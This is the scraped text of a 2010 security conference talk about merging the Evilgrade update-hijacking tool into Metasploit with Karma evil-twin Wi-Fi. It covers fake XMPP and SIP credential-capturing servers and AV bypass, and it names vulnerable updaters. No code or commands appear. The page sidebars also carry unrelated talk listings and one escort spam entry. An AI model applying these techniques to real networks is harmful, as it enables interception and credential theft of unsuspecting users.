Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdf
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Import golang; struct microservice
Import golang; struct microserviceImport golang; struct microservice
Import golang; struct microservice
 
Nikto
NiktoNikto
Nikto
 
Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)
 

Mehr von n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

Mehr von n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Kürzlich hochgeladen

Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxRustici Software
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024The Digital Insurer
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfOverkill Security
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...apidays
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 

Kürzlich hochgeladen (20)

Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

nullcon 2010 - The evil karmetasploit upgrade

  • 1. Veysel Oezer The Evil Karmetasploit Upgrade nullcon Goa 2010 http://nullcon.net
  • 2. Overview Introduction Background Title Realization Results Conclusion Demos in between ! nullcon Goa 2010 http://nullcon.net
  • 3. Introduction IT Security Increasing attacks nullcon Goa 2010 http://nullcon.net
  • 4. Introduction IT Security Increasing attacks also in Germany nullcon Goa 2010 http://nullcon.net
  • 5. Introduction Know your enemy ! ”So it is said that if you know your enemies and know yourself, you will fight without danger in battles. If you only know yourself, but not your opponent, you may win or may lose. If you know neither yourself nor your enemy, you will always endanger yourself.” nullcon Goa 2010 http://nullcon.net
  • 6. Background The man in the middle The hacker tools Evilgrade Metasploit Karma + Karmetasploit nullcon Goa 2010 http://nullcon.net
  • 7. The man in the middle attack nullcon Goa 2010 http://nullcon.net
  • 8. Known MitM attacks ARP spoofing DNS spoofing BGP hacking ICMP redirect, ... Karma ! The evil twin hotspot nullcon Goa 2010 http://nullcon.net
  • 9. Background The hacker tools nullcon Goa 2010 http://nullcon.net
  • 10. Evilgrade Framework for attacking weak update mechanisms ”The idea..is the centralization and exploitation of different update impl. all together in one tool” Written in Perl and published 2007-2008 Existing Module Sun Java nullcon Goa 2010 http://nullcon.net Apple OS X
  • 11. Evilgrade How does it work nullcon Goa 2010 http://nullcon.net
  • 12. Evilgrade nullcon Goa 2010 http://nullcon.net
  • 13. Evilgrade nullcon Goa 2010 http://nullcon.net
  • 14. Metasploit Vulnerability development framework Reduce the work for creating an exploit Penetration testing Several hundert exploits #5 from top 100 security tools Written in Ruby and BSD licensed "Don't try to teach yourself how to use metasploit under the security camera at the airport" nullcon Goa 2010 http://nullcon.net
  • 16. Karma The evil twin access point MitM attack on WinXp Wireless Zero Configuration... Or just name ”FreeWifi” ;) After MitM, steal authentication data Http, Ftp, Pop3, Imap and so on Released in 2004 nullcon Goa 2010 http://nullcon.net
  • 17. Karmetasploit Reimplemantion of Karma into Metasploit Fake access point integrated into aircrack-ng Authentication capturing implemented as auxiliary modules for Metasploit Several improvements Better hardware support Cookie,Form data stealing nullcon Goa 2010 http://nullcon.net Browser exploitation
  • 18. Goals Evilgrade 2 Metasploit Reimplement functionality as metasploit module Improve new system • Port Sharing, Stealth mode, faster metasploit payload generation Transfer existing evilgrade modules into new system Create new fake servers Sip and XMPP Find new vulnerabilities in nullcon Goa 2010 http://nullcon.net software
  • 19. Fake XMPP Based on TCP Used for Jabber → Instant Messaging Google Talk... Has built-in strong security, but depends on server and client Cleartext password transmission possible nullcon Goa 2010 http://nullcon.net
  • 20. Fake Sip Server UDP based protocol Redefined in serveral RFCs Authentication similar to HTTP Digest Challenge – Response Try downgrade attack to use Basic Authentication nullcon Goa 2010 http://nullcon.net
  • 21. Realisation Environments Evilgrade 2 Metasploit Authentication capturing servers Analysis of update mechanisms nullcon Goa 2010 http://nullcon.net
  • 22. Used tools Wireshark Jacksum Vbindiff VmWare Workstation Netcat Ghex nullcon Goa 2010 http://nullcon.net
  • 23. Attack Environment DEMO nullcon Goa 2010 http://nullcon.net
  • 25. Fake XMPP nullcon Goa 2010 http://nullcon.net
  • 27. Analysis 1. Install an old version on the target. 2. Sniff the update process on the attacker. 3. Analyze network communication. 4. If possible, try to simulate the update server. 5. If possible, install latest version on the target. 6. Improve server to be version independent. 7. Improve server to allow to configure options, like the description shown as update information to the client. nullcon Goa 2010 http://nullcon.net
  • 28. Results Fake SIP and XMPP servers Reimplementation of Evilgrade Analysis of update implemenations Not hacked Indirect hacks Hacked nullcon Goa 2010 http://nullcon.net
  • 29. Results – fake server XMPP Works SIP Downgrade attack had no success Capturing of Digest Authentication is working DEMO nullcon Goa 2010 http://nullcon.net
  • 30. Results Evilgrade in Metasploit Reimpl. the old functionality Old modules ported Several improvements • All mentioned ones • Anti-virus bypassing for metasploit payloads ( DEMO at the end if time left ) • Some others... nullcon Goa 2010 http://nullcon.net
  • 31. Results - Analysis Not hacked uTorrent Avira Antivir Foxit Reader Vlc uses PGP Ad-Aware only one that uses SSL Spybot, AVG Antivir, Comodo Firewall, Picasa, ZoneAlarm, Winrar, flashget, camfrog.. nullcon Goa 2010 http://nullcon.net
  • 32. Results – Not hacked Not hacked uTorrent uses binary signed data ?!? nullcon Goa 2010 http://nullcon.net
  • 33. Results – Not hacked Not hacked Avira Antivir ­­­MASTER.IDX­­­ CRDATE=20090505_1833 <3f76d242c16a5491bfe98540f68c36c9> nullcon Goa 2010 http://nullcon.net
  • 34. Results – Not hacked Foxit Reader and the fzip file format nullcon Goa 2010 http://nullcon.net
  • 35. Results - Analysis Indirect hack Skype Quicktime Orbit Downloader Miranda IM DEMO nullcon Goa 2010 http://nullcon.net
  • 36. Results Analysis Hacked Trillian Kerio Firewall SuperAntiSpyware Filezilla GomPlayer Divx Player nullcon Goa 2010 http://nullcon.net
  • 37. Trillian update mechanism Binary update information Can you read that ? nullcon Goa 2010 http://nullcon.net
  • 38. Trillian update mechanism Binary update information nullcon Goa 2010 http://nullcon.net
  • 39. Results - Hacked DEMO nullcon Goa 2010 http://nullcon.net
  • 40. Conclusion Release candidate of evil karmetasploit upgrade is ready No need for Evilgrade anymore Several improvements compared to Evilgrade New authentification capturing servers Several weak update implementations found, over 100 million downloads from www.cnet.com nullcon Goa 2010 http://nullcon.net
  • 41. Conclusion Feature list for version 2 SIP downgrade attack on old SIP hardware Fake server XMPP over HTTP Improve design to handle Avira Antivir Feature list of version 3 Advanded stealth mode • Intelligent fake DNS server Find more vulnerabilites nullcon Goa 2010 http://nullcon.net
  • 42. Conclusion Software developers Please make secure software Use standards and deny weak stuff by default And for the rest of us Be aware of this attack vectors Do not install every ”important security update” Do not trust security software by default Do not trust the Internet, nullcon Goa 2010 http://nullcon.net especially (public) Wifi networks
  • 43. That's it ! Q & A nullcon Goa 2010 http://nullcon.net